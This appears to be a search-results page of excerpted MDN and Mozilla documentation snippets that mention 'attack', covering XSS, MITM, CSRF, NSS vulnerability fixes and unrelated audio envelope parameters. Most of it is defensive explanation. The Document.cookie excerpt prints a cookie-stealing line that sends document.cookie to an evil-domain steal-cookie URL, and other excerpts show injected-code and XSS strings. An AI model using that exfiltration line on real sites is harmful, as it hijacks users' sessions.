Vulnerabilities - Archive of obsolete content
an example is an input validation error, such as user-provided input not being properly evaluated for malicious character strings and overly long values associated with known attacks.
... another example is a race condition error that allows the attacker to perform a specific action with elevated privileges.
...an attacker could craft a fraudulent email message that contains hyperlinks that, when rendered in html, appear to the recipient to be benign but actually take the recipient to a malicious web site when they are clicked on.
...And 2 more matches

Denial of Service - MDN Web Docs Glossary: Definitions of Web-related terms
dos (denial of service) is a network attack that prevents legitimate use of server resources by flooding the server with requests.
...a dos attack consists of various techniques to exhaust these resources and make a server or a network unavailable to legitimate users, or at least make the server perform sluggishly.
... there are also distributed denial of service (ddos) attacks in which a multitude of servers are used to exhaust the computing capacity of an attacked computer.
...And 2 more matches

NSS 3.14.3 release notes
notable changes in nss 3.14.3 cve-2013-1620 recent research by nadhem alfardan and kenny patterson has highlighted a weakness in the handling of cbc padding as used in ssl, tls, and dtls that allows an attacker to exploit timing differences in mac processing.
... the details of their research and the attack can be found at http://www.isg.rhul.ac.uk/tls/, and has been referred to as "lucky thirteen".
... nss 3.14.3 includes changes to the softoken and ssl libraries to address and mitigate these attacks, contributed by adam langley of google.
...And 2 more matches

Advanced techniques: Creating and sequencing audio - Web APIs
let's say our envelope has attack and release.
... we can allow the user to control these using range inputs on the interface: <label for="attack">attack</label> <input name="attack" id="attack" type="range" min="0" max="1" value="0.2" step="0.1" /> <label for="release">release</label> <input name="release" id="release" type="range" min="0" max="1" value="0.5" step="0.1" /> now we can create some variables over in javascript and have them change when the input values are updated: let attacktime = 0.2; const attackcontrol = document.queryselector('#attack'); attackcontrol.addeventlistener('input', function() { attacktime = number(this.value); }, false); let releasetime = 0.5; const releasecontrol = document.queryselector('#release'); releasecontrol.addeventlistener('input', function() { releasetime = number(this.value); }, false); ...
... for our attack and release, we'll use the linearramptovalueattime method as mentioned above.
...And 2 more matches

X-XSS-Protection - HTTP
the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss) attacks.
...if a cross-site scripting attack is detected, the browser will sanitize the page (remove the unsafe parts).
...rather than sanitizing the page, the browser will prevent rendering of the page if an attack is detected.
...And 2 more matches

Securing your site - Web security
hash passwords using a secure algorithm (owasp) storing passwords in plain text can lead to attackers knowing and leaking the exact password of your site's users, potentially putting the users at risk.
... content security policy an added layer of security that helps to detect and mitigate certain types of attacks, including cross site scripting (xss) and data injection attacks.
... these attacks are used for everything from data theft to site defacement or distribution of malware.
...And 2 more matches

Security Controls - Archive of obsolete content
for example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...think of phishing attacks.
... for example, sensitive data on a server may be protected from external attack by several controls, including a network-based firewall, a host-based firewall, and os patching.

Introduction to SSL - Archive of obsolete content
although the fourth question is not technically part of the ssl protocol, it is the client's responsibility to support this requirement, which provides some assurance of the server's identity and thus helps protect against a form of security attack known as "man in the middle." an ssl-enabled client goes through these steps to authenticate a server's identity: is today's date within the validity period?
...although step 4 is not technically part of the ssl protocol, it provides the only protection against a form of security attack known as "man in the middle." clients must perform this step and must refuse to authenticate the server or establish a connection if the domain names don't match.
... man-in-the-middle attack as suggested in step 4 above, the client application must check the server domain name specified in the server certificate against the actual domain name of the server with which the client is attempting to communicate.
... this step is necessary to protect against a man-in-the-middle attack, which works as follows.

Cross-site scripting - MDN Web Docs Glossary: Definitions of Web-related terms
cross-site scripting (xss) is a security exploit which allows an attacker to inject into a website malicious client-side code.
... this code is executed by the victims and lets the attackers bypass access controls and impersonate users.
... these attacks succeed if the web app does not employ enough validation or encoding.
... learn more general knowledge cross-site scripting (xss) cross-site scripting on wikipedia cross-site scripting on owasp another article about cross-site scripting xss attack – exploit & protection ...

Session Hijacking - MDN Web Docs Glossary: Definitions of Web-related terms
session hijacking occurs when an attacker takes over a valid session between two computers.
... the attacker steals a valid session id in order to break into the system and snoop data.
...in tcp session hijacking, an attacker gains access by taking over a tcp session between two machines in mid session.
... session hijacking occurs because no account lockout for invalid session ids weak session-id generation algorithm insecure handling indefinite session expiration time short session ids transmission in plain text session hijacking process sniff, that is perform a man-in-the-middle (mitm) attack, place yourself between victim and server.

Phishing: a short definition
this email will usually contain a link pretending to lead to the original service, but in reality, taking the victim to an attacker-controlled website.
... past and current countermeasures various technical, and social approaches, exist to combat phishing attacks.
...as most phishing attacks start with unsolicited email messages, a clear starting point is improving spam filters, thus reducing the number of fraudulent messages reaching users.
...this can be phished by an attacker, though with totp apps the attacker has limited time to make their unauthorized login.

sslerr.html
if this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...this may indicate that an attack on that server is underway.
...if this occurs frequently on a server, an active attack (such as the "million question" attack) may be underway against the server.
...if encountered repeatedly on a server socket, this can indicate that the server is actively under a "million question" attack.

Lighting a WebXR setting - Web APIs
decoupling orientation from lighting in an ar application that uses geolocation to determine orientation and potentially position information, avoiding having that information directly correlate to the state of the lighting is another way browsers can protect users from fingerprinting attacks.
... temporal and spatial filtering consider an attack that uses a building's automated lighting system to flash the lights on and off quickly in a known pattern.
...this could be done remotely, or it could be performed by an attacker who's located in the same room but wants to determine if the other person is also in the same room.
... the lighting estimation api specification mandates that all user agents perform temporal and spatial filtering to fuzz the data in a manner that reduces its usefulness for the purpose of locating the user or performing side-channel attacks.

Index - HTTP
this helps guard against cross-site scripting attacks (xss).
... 91 public-key-pins hpkp, http, reference, security, header the http public-key-pins response header associates a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
...sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.
... 122 x-xss-protection http, reference, security, xss, header the http x-xss-protection response header is a feature of internet explorer, chrome and safari that stops pages from loading when they detect reflected cross-site scripting (xss) attacks.

Index - Archive of obsolete content
for example, if a system has a known vulnerability that attackers could exploit, the system should be patched so that the vulnerability is removed or mitigated.
...limiting functionality and resolving security weaknesses have a common goal: give attackers as few opportunities as possible to breach a system.
...threats may involve intentional actors (e.g., attacker who wants to access information on a server) or unintentional actors (e.g., administrator who forgets to disable user accounts of a former employee.) threats can be local, such as a disgruntled employee, or remote, such as an attacker in another geographical area.

Confidentiality, Integrity, and Availability - Archive of obsolete content
now imagine that an attacker can shop on your web site and maliciously alter the prices of your products, so that they can buy anything for whatever price they choose.
...another example of a failure of integrity is when you try to connect to a website and a malicious attacker between you and the website redirects your traffic to a different website.
...if an attacker is not able to compromise the first two elements of information security (see above) they may try to execute attacks like denial of service that would bring down the server, making the website unavailable to legitimate users due to lack of availability.

Encryption and Decryption - Archive of obsolete content
manually finding the key to break an algorithm is called a brute force attack.
... the key strength of an algorithm is determined by finding the fastest method to break the algorithm and comparing it to a brute force attack.
...(for more information about rc4 and other ciphers used with ssl, see "introduction to ssl.") an encryption key is considered full strength if the best known attack to break the key is no faster than a brute force attempt to test every key possibility.

MitM - MDN Web Docs Glossary: Definitions of Web-related terms
a man-in-the-middle attack (mitm) intercepts a communication between two systems.
... in physical mail and in online communication, mitm attacks are tough to defend.
... learn more owasp article: man-in-the-middle attack wikipedia: man-in-the-middle attack the public-key-pins header (hpkp) can significantly decrease the risk of mitm by instructing browsers to require a whitelisted certificate for all subsequent connections to that website.

JSAPI User Guide
unless you also regularly deploy spidermonkey security updates, a determined hacker could use publicly known bugs in the engine to attack your application.
... note that the kind of attack we're talking about here is where a hacker uses javascript to attack the c++ code of the engine itself (or your embedding).
... block simple denial-of-service attacks - a program like while(true){} should not hang your application.

Secure Development Guidelines
asic registers (eax, ebx, ecx, edx, edi, esi) 2 stack-related registers (esp, ebp) mark top and bottom of current stack frame status register (eflags) contains various state information instruction pointer (eip) points to register being executed; can’t be modified directly introduction: gaining control (2) eip is modified using call or jump instructions attacks usually rely on obtaining control over the eip otherwise the attacker can try to control memory pointed to by an existing function pointer a vulnerability is required to modify the eip or sensitive memory saved return addr or function pointer get altered introduction: gaining control (3) common issues used to gain control buffer overflows format string bugs integer overflows/...
...ation most vulnerabilities are a result of un-validated input always perform input validation could save you without knowing it examples: if it doesn’t have to be negative, store it in an unsigned int if the input doesn’t have to be > 512, cut it off there if the input should only be [a-za-z0-9], enforce it cross site scripting (xss) xss is a type of code injection attack typically occurs in web applications injection of arbitrary data into an html document from another site victim’s browser executes those html instructions could be used to steal user credentials think: webmail, online auction, cms, online banking...
... to the user html encoding &amp; → & &lt; → < &gt; → > &quot; → " &apos; → ' url encoding % encoding java/vbscript escaping depends on the context; in a single-quoted string, escaping ' would suffice sql injection occurs when un-trusted input is mixed with a sql string sql is a language used to interact with databases code injection attack that is similar to xss but targeted at sql rather than html and javascript if input is mixed with sql, it could itself become an sql instruction and be used to: query data from the database (passwords) insert value into the database (a user account) change application logic based on results returned by the database sql injection: example snprintf(str, sizeof(str), "...

SubtleCrypto.encrypt() - Web APIs
the web crypto api supports three different aes modes: ctr (counter mode) cbc (cipher block chaining) gcm (galois/counter mode) it's strongly recommended to use authenticated encryption, which includes checks that the ciphertext has not been modified by an attacker.
... authentication helps protect against chosen-ciphertext attacks, in which an attacker can ask the system to decrypt arbitrary messages, and use the result to deduce information about the secret key.
... one major difference between this mode and the others is that gcm is an "authenticated" mode, which means that it includes checks that the ciphertext has not been modified by an attacker.

Strict-Transport-Security - HTTP
this creates an opportunity for a man-in-the-middle attack.
... note: the strict-transport-security header is ignored by the browser when your site is accessed using http; this is because an attacker may intercept http connections and inject the header or remove it.
... strict transport security resolves this problem; as long as you've accessed your bank's web site once using https, and the bank's web site uses strict transport security, your browser will know to automatically use only https, which prevents hackers from performing this sort of man-in-the-middle attack.

Planned changes to shared memory - JavaScript
these changes provide further isolation between sites and help reduce the impact of attacks with high-resolution timers, which can be created with shared memory.
... for top-level documents, two headers will need to be set: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) with these two headers set, postmessage() will no longer throw for sharedarraybuffer objects and shared memory across threads is therefore available.
...note that setting the cross-origin-resource-policy header to any other value than same-origin opens up the resource to potential attacks, such as spectre.

Privacy, permissions, and information security
modern browsers take steps to help prevent fingerprinting-based attacks by either not allowing information to be accessed or, where the information must be made available, by introducing variations that prevent it from being used for identification purposes.
... certificate transparency an open standard for monitoring and auditing certificates, creating a database of public logs that can be used to help identify incorrect or malicious certificates content security policy provides the ability to define the extent to which a document's content can be accessed by other devices over the web; used in particular to prevent or mitigate attacks on the server feature policy lets web developers selectively enable, disable, and modify the behavior of certain features and apis both for a document and for subdocuments loaded in <iframe>s <iframe>'s allow attribute technically part of feature policy, the allow attribute on an <iframe> specifies which web features the document in the frame should be allowed to access ...
... http public key pinning (hpkp) hpkp is used by servers to instruct a client to associate a specific public key with the server going forward in order to decrease the likelihood of man-in-the-middle attacks http strict transport security (hsts) hsts is used by servers to let them protect themselves from protocol downgrade and cookie hijack attacks by letting sites tell clients that they can only use https to communicate with the server http/2 while http/2 technically does not have to use encryption, most browser developers are only supporting it when used with https, so it can be thought of in that regard as being security-related permissions api provides a way to determine the status of permissions for the current browser context transport ...

Insecure passwords - Web security
serving login forms over http is especially dangerous because of the wide variety of attacks that can be used against them to extract a user’s password.
...websites that handle user data should use https to protect their users from attackers.
...attackers are getting smarter; they steal username/password pairs from one site and then try reusing them on more lucrative sites.

Appendix C: Avoiding using eval in Add-ons - Archive of obsolete content
if using an unencrypted, insecure connection, a man-in-the-middle attacker might replace the json with attack code before it arrives at the user.
...settimeout("alert('" + xhr.responsetext + "');", 100); // attacker manipulated responsetext to contain "attack!'); format_computer(); alert('done" settimeout("alert('attack!'); format_computer(); alert('done');", 100); as a general rule of thumb, just don't pass code around as strings and execute it by calling eval, settimeout and friends.

Cipher - MDN Web Docs Glossary: Definitions of Web-related terms
modern ciphers are designed to withstand attacks discovered by a cryptanalyst.
... there is no guarantee that all attack methods have been discovered, but each algorithm is judged against known classes of attacks.

MDN Web Docs Glossary: Definitions of Web-related terms
descriptor (css) deserialization developer tools dhtml digest digital certificate distributed denial of service dmz dns doctype document directive document environment dom (document object model) domain domain name domain sharding dominator dos attack dtls (datagram transport layer security) dtmf (dual-tone multi-frequency signaling) dynamic programming language dynamic typing e ecma ecmascript effective connection type element empty element encapsulation encryption endianness engine entity enti...
...webp webrtc websockets webvtt whatwg whitespace world wide web wrapper x xforms xhr (xmlhttprequest) xhtml xinclude xlink xml xpath xquery xslt other 404 502 alpn at-rule attack byte-order mark character set client cryptosystem debug digital signature execution flex-direction glsl interface library memory management routers self-executing anonymous function stylesheet vector image ...

Sending form data - Learn web development
html forms are by far the most common server attack vectors (places where attacks can occur).
... the website security article of our server-side learning topic discusses a number of common attacks and potential defences against them in detail.

Server-side web frameworks - Learn web development
html, json, xml), and improving security against web attacks.
... web security: some web frameworks provide better support for handling common web attacks.

Mozilla Port Blocking
background on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting attack, known as the html form protocol attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.

An overview of NSS Internals
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...as soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.

Index
often freeing is combined with immediately erasing (zeroing, zfree) the memory associated to the arena, in order to make it more difficult for attackers to extract keys from a memory dump.
...as soon as you set a master password, an attacker stealing your key database will no longer be able to get access to your private key, unless the attacker would also succeed in stealing the master password.

NSS 3.19.2.1 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.

NSS 3.19.4 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.

NSS 3.20.1 release notes
an attacker that successfully exploited these issues can overflow the heap and may be able to obtain remote code execution.
...this may allow attackers to bypass security checks and obtain control of arbitrary memory.

NSS 3.24 release notes
update nss to protect it against the cachebleed attack.
... bugs fixed in nss 3.24 this bugzilla query returns all the bugs fixed in nss 3.24: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advanced&product=nss&target_milestone=3.24 acknowledgements the nss development team would like to thank yuval yarom for responsibly disclosing the cachebleed attack by providing advance copies of their research.

JS::CompileOptions
this allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.

JSErrorReport
this allows an attack by which a malicious website loads a sensitive file (say, a bank statement) cross-origin (using the user's cookies), and sniffs the generated syntax errors (via a window.onerror handler) for juicy morsels of its contents.
... to counter this attack, html5 specifies that script errors should be sanitized ("muted") when the script is not same-origin with the global for which it is loaded.

Handling Mozilla Security Bugs
background security vulnerabilities are different from other bugs, because their consequences are potentially so severe: users' private information (including financial information) could be exposed, users' data could be destroyed, and users' systems could be used as platforms for attacks on other systems.
...we understand and acknowledge the concerns of those who believe that too-hasty disclosure of exploit details can provide a short-term advantage to potential attackers, who can exploit a problem before most end users become aware of its existence.

Xray vision
if chrome-privileged code is compromised, the attacker can take over the user's computer.
...so this is not a straightforward privilege escalation attack, although it might lead to one if the chrome code is sufficiently confused.

Mozilla
mozilla port blocking on 08/15/2001, cert issued a vulnerability note vu#476267 for a "cross-protocol" scripting attack, known as the html form protocol attack which allowed sending arbitrary data to most tcp ports.
... a simple exploit of this hole allows an attacker to send forged unsigned mail through a mail server behind your firewall: a really nasty hole.

DOMHighResTimeStamp - Web APIs
also note the section below on reduced time precision controlled by browser preferences to avoid timing attacks and fingerprinting.
... reduced time precision to offer protection against timing attacks and fingerprinting, the precision of time stamps might get rounded depending on browser settings.

Document.cookie - Web APIs
this is sufficient for user tracking, but it will prevent many csrf attacks.
...common ways to steal cookies include using social engineering or by exploiting an xss vulnerability in the application - (new image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie; the httponly cookie attribute can help to mitigate this attack by preventing access to cookie value through javascript.

DynamicsCompressorNode - Web APIs
dynamicscompressornode.attack read only is a k-rate audioparam representing the amount of time, in seconds, required to reduce the gain by 10 db.
... a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

Element.innerHTML - Web APIs
there is potential for this to become an attack vector on a site, creating a potential security risk.
... name = "<script>alert('i am john in an annoying alert!')</script>"; el.innerhtml = name; // harmless in this case although this may look like a cross-site scripting attack, the result is harmless.

Index - Web APIs
1057 dynamicscompressornode() audio, constructor, dynamicscompressornode, media, web audio api the dynamicscompressornode() constructor creates a new dynamicscompressornode object which provides a compression effect, which lowers the volume of the loudest parts of the signal 1058 dynamicscompressornode.attack api, attack, dynamicscompressornode, property, reference, web audio api an audioparam.
...although the window.crypto property itself is read-only, all of its methods (and the methods of its child object, subtlecrypto) are not read-only, and therefore vulnerable to attack by polyfill.

performance.now() - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of performance.now() might get rounded depending on browser settings.
...coop process-isolates your document and potential attackers can't access to your global object if they were opening it in a popup, preventing a set of cross-origin attacks dubbed xs-leaks.

window.postMessage() - Web APIs
shared memory is gated behind two http headers: cross-origin-opener-policy with same-origin as value (protects your origin from attackers) cross-origin-embedder-policy with require-corp as value (protects victims from your origin) cross-origin-opener-policy: same-origin cross-origin-embedder-policy: require-corp to check if cross origin isolation has been successful, you can test against the crossoriginisolated property available to window and worker contexts: if (crossoriginisolated) { // post sharedarraybuffer } else {...
...this cannot be overstated: failure to check the origin and possibly source properties enables cross-site scripting attacks.

Set-Cookie - HTTP
this mitigates attacks against cross-site scripting (xss).
... asserts that a cookie must not be sent with cross-origin requests, providing some protection against cross-site request forgery attacks (csrf).

HTTP headers - HTTP
x-download-options the x-download-options http header indicates that the browser (internet explorer) should not display the option to "open" a file that has been downloaded from an application, to prevent phishing attacks as the file otherwise would gain access to execute in the context of the application.
... public-key-pins associates a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.

HTTP Public Key Pinning (HPKP) - HTTP
http public key pinning (hpkp) was a security feature that used to tell a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.
...if an attacker is able to compromise a single ca, they can perform mitm attacks on various tls connections.

Secure contexts - Web security
the primary goal of secure contexts is to prevent mitm attackers from accessing powerful apis that could further compromise the victim of an attack.
... some apis on the web are very powerful, giving an attacker the ability to do the following and more: invade a user's privacy.

Subresource Integrity - Web security
however, using cdns also comes with a risk, in that if an attacker gains control of a cdn, the attacker can inject arbitrary malicious content into files on the cdn (or replace the files completely) and thus can also potentially attack all sites that fetch files from that cdn.
... subresource integrity enables you to mitigate some risks of attacks such as this, by ensuring that the files your web application or web document fetches (from a cdn or anywhere) have been delivered without a third-party having injected any additional content into those files — and without any other changes of any kind at all having been made to those files.

Transport Layer Security - Web security
though the performance gains from 0-rtt can be significant, they come with some risk of replay attack, so some care is needed before enabling this feature.
...enabling 0-rtt requires additional steps, both to ensure successful deployment and to manage the risks of replay attacks.

Weak signature algorithms - Web security
weaknesses in hash algorithms can lead to situations in which attackers can create or obtain fraudulent certificates.
... as new attacks are found and improvements in available technology make attacks more feasible, the use of older algorithms is discouraged and support for them is eventually removed.

SDK and XUL Comparison - Archive of obsolete content
security if they're not carefully designed, firefox add-ons can open the browser to attack by malicious web pages.

Extension Versioning, Update and Compatibility - Archive of obsolete content
securing updates gecko 1.9 has added additional requirements designed to protect users from man-in-the-middle attacks and the like during add-on updates.

Connecting to Remote Content - Archive of obsolete content
you would of course need to be very careful about escaping characters and protecting yourself against sql injection attacks.

Appendix E: DOM Building and Insertion (HTML & XUL) - Archive of obsolete content
failure to do so can lead to execution or remote scripts, and in the worst cases to privilege escalation which can leave a user's pc open to remote attack.

Security best practices in extensions - Archive of obsolete content
non-chrome urls in chrome xul or html such as the following example are not allowed: <script type="text/javascript" src="http://mysite.greatsite.com/js/wow-content.js" /> in general, scripts that are from remote sources that run in the chrome context are not acceptable, as many times the source of the script can never be 100% guaranteed, and they are vulnerable to man-in-the-middle attacks.

XUL Questions and Answers - Archive of obsolete content
support for non-rdf datasources for xul template is planned (bug 321170): xml datasources (bug 321171) storage (sqlite) datasources (bug 321172) when loading an xslt stylesheet into an xml i get the error: "error loading stylesheet: an xslt stylesheet load was blocked for security reasons." that error is from a security check that has been put up to safeguard against cross-site-scripting attacks.

Introduction to Public-Key Cryptography - Archive of obsolete content
for an overview of ssl, see "introduction to ssl." for an overview of encryption and decryption, see "encryption and decryption." information on digital signatures is available from "digital signatures." public-key cryptography is a set of well-established techniques and standards for protecting communications from eavesdropping, tampering, and impersonation attacks.

CSP - MDN Web Docs Glossary: Definitions of Web-related terms
a csp (content security policy) is used to detect and mitigate certain types of website related attacks like xss and data injections.

CSRF - MDN Web Docs Glossary: Definitions of Web-related terms
csrf (cross-site request forgery) is an attack that impersonates a trusted user and sends a website unwanted commands.

Cryptographic hash function - MDN Web Docs Glossary: Definitions of Web-related terms
tible (each digest could come from a very large number of messages, and only brute-force can generate a message that leads to a given digest) tamper-resistant (any change to a message leads to a different digest) collision-resistant (it should be impossible to find two different messages that produce the same digest) cryptographic hash functions such as md5 and sha-1 are considered broken, as attacks have been found that significantly reduce their collision resistance.

DMZ - MDN Web Docs Glossary: Definitions of Web-related terms
learn more general knowledge dmz on wikipedia learn about it web servers and firewall - maximum security against attack on mdn ody> ...

HPKP - MDN Web Docs Glossary: Definitions of Web-related terms
http public key pinning (hpkp) is a security feature that tells a web client to associate a specific cryptographic public key with a certain web server to decrease the risk of mitm attacks with forged certificates.

Placeholder names - MDN Web Docs Glossary: Definitions of Web-related terms
placeholder names are commonly used in cryptography to indicate the participants in a conversation, without resorting to terminology such as "party a," "eavesdropper," and "malicious attacker." the most commonly used names are: alice and bob, two parties who want to send messages to each other, occasionally joined by carol, a third participant eve, a passive attacker who is eavesdropping on alice and bob's conversation mallory, an active attacker ("man-in-the-middle") who is able to modify their conversation and replay old messages ...

Random Number Generator - MDN Web Docs Glossary: Definitions of Web-related terms
these include: that it's computationally unfeasible for an attacker (without knowledge of the seed) to predict its output that if an attacker can work out its current state, this should not enable the attacker to work out previously emitted numbers.

RTP (Real-time Transport Protocol) and SRTP (Secure RTP) - MDN Web Docs Glossary: Definitions of Web-related terms
the secure version of rtp, srtp, is used by webrtc, and uses encryption and authentication to minimize the risk of denial-of-service attacks and security breaches.

Same-origin policy - MDN Web Docs Glossary: Definitions of Web-related terms
it helps isolate potentially malicious documents, reducing possible attack vectors.

Challenge-response authentication - MDN Web Docs Glossary: Definitions of Web-related terms
challenge-response protocols are one way to fight against replay attacks where an attacker listens to the previous messages and resends them at a later time to get the same credentials as the original message.

Introduction to client-side frameworks - Learn web development
there are a number of advantages of this approach, mostly around performance (your user's device isn’t building the page with javascript; it's already complete) and security (static pages have fewer attack vectors).

Experimental features in Firefox
nightly 81 yes developer edition — — beta — — release — — preference name — security and privacy block plain text requests from flash on encrypted pages in order to help mitigate man-in-the-middle (mitm) attacks caused by flash content on encrypted pages, a preference has been added to treat object_subrequests as active content.

Script security
if the code is compromised, the attacker can take over the user's computer.

Localization content best practices
example: this web page at <span id='malware_sitename'/> has been reported as an attack page and has been blocked based on your security preferences.

Mozilla Development Strategies
since they are going to be reviewing your code later, run your plan of attack by them first.

Gecko Profiler FAQ
you’ll probably want to accumulate costs that are somehow “similar” or “in the same bucket” but distributed over different parts of the call tree / time line, and then attack the biggest bucket.

NSS FAQ
it contains bugs that were never fixed, doesn't support tls or or the new 56-bit export cipher suites, and does not contain the fix to the bleichenbacher attack on pkcs#1.

NSS 3.12.5 release_notes
bug 525056: timing attack against ssl3ext.c:ssl3_serverhandlesessionticketxtn() bug 526689: ssl3 & tls renegotiation vulnerability documentation for a list of the primary nss documentation pages on mozilla.org, see nss documentation.

NSS 3.19.1 release notes
this patch release includes a fix for the recently published logjam attack.

NSS 3.19.2.3 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.

NSS 3.21.1 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.

NSS 3.22.2 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.

NSS 3.23 release notes
an attacker could create a specially-crafted certificate which, when parsed by nss, would cause a crash or execution of arbitrary code with the permissions of the user.

NSS 3.36.6 release notes
this is a patch release to fix cve-2018-12404 bugs fixed in nss 3.36.6 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1389967 and bug 1448748 - fixes for mingw on x64 platforms.

NSS 3.40.1 release notes
this is a patch release to fix cve-2018-12404 new functions none bugs fixed in nss 3.40.1 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) compatibility nss 3.40.1 shared libraries are backward compatible with all older nss 3.x shared libraries.

NSS 3.41 release notes
gerprint: 27995829fe6a7515c1bfe848f9c4761db16c225929257bf40d0894f29ea8baf2 cn = opentrust root ca g3 sha-256 fingerprint: b7c36231706e81078c367cb896198f1e3208dd926949dd8f5709a410f75b6292 bugs fixed in nss 3.41 bug 1412829, reject empty supported_signature_algorithms in certificate request in tls 1.2 bug 1485864 - cache side-channel variant of the bleichenbacher attack (cve-2018-12404) bug 1481271 - resend the same ticket in clienthello after helloretryrequest bug 1493769 - set session_id for external resumption tokens bug 1507179 - reject ccs after handshake is complete in tls 1.3 this bugzilla query returns all the bugs fixed in nss 3.41: https://bugzilla.mozilla.org/buglist.cgi?resolution=fixed&classification=components&query_format=advan...

nss tech note7
to prevent denial-of-service attacks with huge public keys, nss disallows modulus size greater than 8192 bits.

Notes on TLS - SSL 3.0 Intolerant Servers
technical information the ssl 3.0 and tls (aka ssl 3.1) specs both contain a provision -- the same provision -- for detecting "version rollback attacks".

NSS environment variables
3.12 nss_ssl_cbc_random_iv string ("0", "1") controls the workaround for the beast attack on ssl 3.0 and tls 1.0.

sslintro.html
specifies a callback function used to authenticate an incoming certificate (optional for servers, necessary for clients to avoid "man-in-the-middle" attacks).

Zest tools
the following tools currently support zest: owasp zed attack proxy the zap add-on allows the user to create, edit and run zest scripts.

Components.utils.Sandbox
if the sandbox interacts with untrusted content this should be set to false when possible to further reduce possible attack surface.

nsIURI
this is useful for authentication, managing sessions, or for checking the origin of an uri to prevent cross-site scripting attacks while using methods such as window.postmessage().

Setting HTTP request headers
by not advertising to all sites what extensions are installed this improves both privacy (this makes it harder to track a user known by his set of plugins, addons and extensions) and security (some plugins, addons and extensions may be known to have flaws by attackers).

Storage
by binding the parameters, you prevent possible sql injection attacks since a bound parameter can never be executed as sql.

Debugger-API - Firefox Developer Tools
by design, it ought not to introduce security holes, so in principle it could be made available to content as well; but it is hard to justify the security risks of the additional attack surface.

Cookies - Firefox Developer Tools
same-site cookies allow servers to mitigate the risk of csrf and information leakage attacks by asserting that a particular cookie should only be sent with requests initiated from the same registrable domain.

Animation.currentTime - Web APIs
her animation's currenttime to half her keyframeeffect's duration: alicechange.currenttime = alicechange.effect.timing.duration / 2; a more generic means of seeking to the 50% mark of an animation would be: animation.currenttime = animation.effect.getcomputedtiming().delay + animation.effect.getcomputedtiming().activeduration / 2; reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.currenttime might get rounded depending on browser settings.

Animation.startTime - Web APIs
waapicats.appendchild(newcat); } reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animation.starttime might get rounded depending on browser settings.

AnimationPlaybackEvent.currentTime - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of playbackevent.currenttime might get rounded depending on browser settings.

AnimationTimeline.currentTime - Web APIs
reduced time precision to offer protection against timing attacks and fingerprinting, the precision of animationtimeline.currenttime might get rounded depending on browser settings.

AudioParam - Web APIs
var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); specifications specification status comment web audio apithe definition of 'audioparam' in that specification.

AuthenticatorAssertionResponse.authenticatorData - Web APIs
the server will ensure that this hash matches a hash of its own origin in order to prevent phishing or other man-in-the-middle attacks.

BaseAudioContext.createDynamicsCompressor() - Web APIs
a mediaelementaudiosourcenode // feed the htmlmediaelement into it var source = audioctx.createmediaelementsource(myaudio); // create a compressor node var compressor = audioctx.createdynamicscompressor(); compressor.threshold.setvalueattime(-50, audioctx.currenttime); compressor.knee.setvalueattime(40, audioctx.currenttime); compressor.ratio.setvalueattime(12, audioctx.currenttime); compressor.attack.setvalueattime(0, audioctx.currenttime); compressor.release.setvalueattime(0.25, audioctx.currenttime); // connect the audiobuffersourcenode to the destination source.connect(audioctx.destination); button.onclick = function() { var active = button.getattribute('data-active'); if(active == 'false') { button.setattribute('data-active', 'true'); button.innerhtml = 'remove compression';...

BaseAudioContext.currentTime - Web APIs
